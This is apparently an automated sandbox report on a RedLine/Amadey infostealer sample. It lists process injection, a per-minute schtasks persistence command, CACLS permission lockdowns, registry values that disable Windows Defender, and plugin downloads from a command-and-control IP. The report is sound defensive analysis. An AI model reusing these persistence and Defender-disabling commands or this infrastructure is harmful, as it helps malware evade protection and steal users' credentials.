Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0058D070
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0058E883
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005971D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_005971D1
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00592658 SetUnhandledExceptionFilter,	2_2_00592658
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008D7A74 SetUnhandledExceptionFilter,	6_2_008D7A74
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008D7208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_008D7208
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008D790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_008D790F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008DBB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_008DBB20

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 6_2_008C38C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,

6_2_008C38C0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000718A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

0_2_000718A3

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: GetLocaleInfoA,		2_2_00417A20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: GetLocaleInfoA,		2_2_00597C87

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 6_2_008D7AFC cpuid

6_2_008D7AFC

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00077155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00077155

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 6_2_008E3C76 _free,_free,_free,GetTimeZoneInformation,_free,

6_2_008E3C76

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Code function: 4_2_00007FF9A5D4077D GetUserNameA,

4_2_00007FF9A5D4077D

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00072BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_00072BFB

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 6.2.xriv.exe.8c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.xriv.exe.8c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4b3b820.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4b3b820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.365076498.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.375060444.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.369836464.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.755532601.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.822951926.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.620289864.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.619946114.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.494123229.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.363553384.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.493543411.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.748563706.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mnolyk.exe PID: 2328, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 19.2.rundll32.exe.6e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	2 Bypass User Access Control	21 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Windows Service	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Service Execution	1 Services File Permissions Weakness	111 Process Injection	2 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	1 Registry Run Keys / Startup Folder	2 Bypass User Access Control	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	1 Services File Permissions Weakness	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	111 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Services File Permissions Weakness	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Rundll32	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	64%	ReversingLabs	Win32.Trojan.RedLine
file.exe	53%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	81%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	81%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	62%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	81%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	49%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.Disabler
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	81%	ReversingLabs	Win32.Trojan.Amadey

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpoft	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phprundll32.exe=	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	2%	Virustotal		Browse
http://62.204.41.4/Gol478Ns/index.phpa	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpd	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpm32	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpi	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpn	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpion	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phps	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php5342a2	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php4	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php(l	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php9e5342a2	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/cred64.dlls	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpp	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpH	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php8	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpC	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpZI	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpa106e76	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phprundll32.exel	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpQ	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpR	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.phpix	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	100%	Avira URL Cloud	malware
62.204.41.4/Gol478Ns/index.php	100%	Avira URL Cloud	malware
http://62.204.41.4/Gol478Ns/index.phprundll32.exe#	0%	Avira URL Cloud	safe
http://62.204.41.4/Gol478Ns/index.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	true	Avira URL Cloud: malware	unknown
62.204.41.4/Gol478Ns/index.php	true	Avira URL Cloud: malware	low
http://62.204.41.4/Gol478Ns/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://62.204.41.4/Gol478Ns/index.phpoft	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phprundll32.exe=	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpd	mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpa	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpm32	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpn	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpi	mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpion	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php5342a2	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phps	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php4	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpp	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php(l	mnolyk.exe, 00000007.00000002.823055961.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php8	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpC	mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/cred64.dlls	mnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.php9e5342a2	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpH	mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phprundll32.exel	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpa106e76	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpZI	mnolyk.exe, 00000007.00000002.823055961.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpix	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpQ	mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phprundll32.exe#	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/index.phpR	mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.4	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800795
Start date and time:	2023-02-07 19:55:34 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@37/14@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 40.7% (good quality ratio 39%) Quality average: 85% Quality standard deviation: 24.3%
HCA Information:	Successful, ratio: 92% Number of executed functions: 100 Number of non-executed functions: 139
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

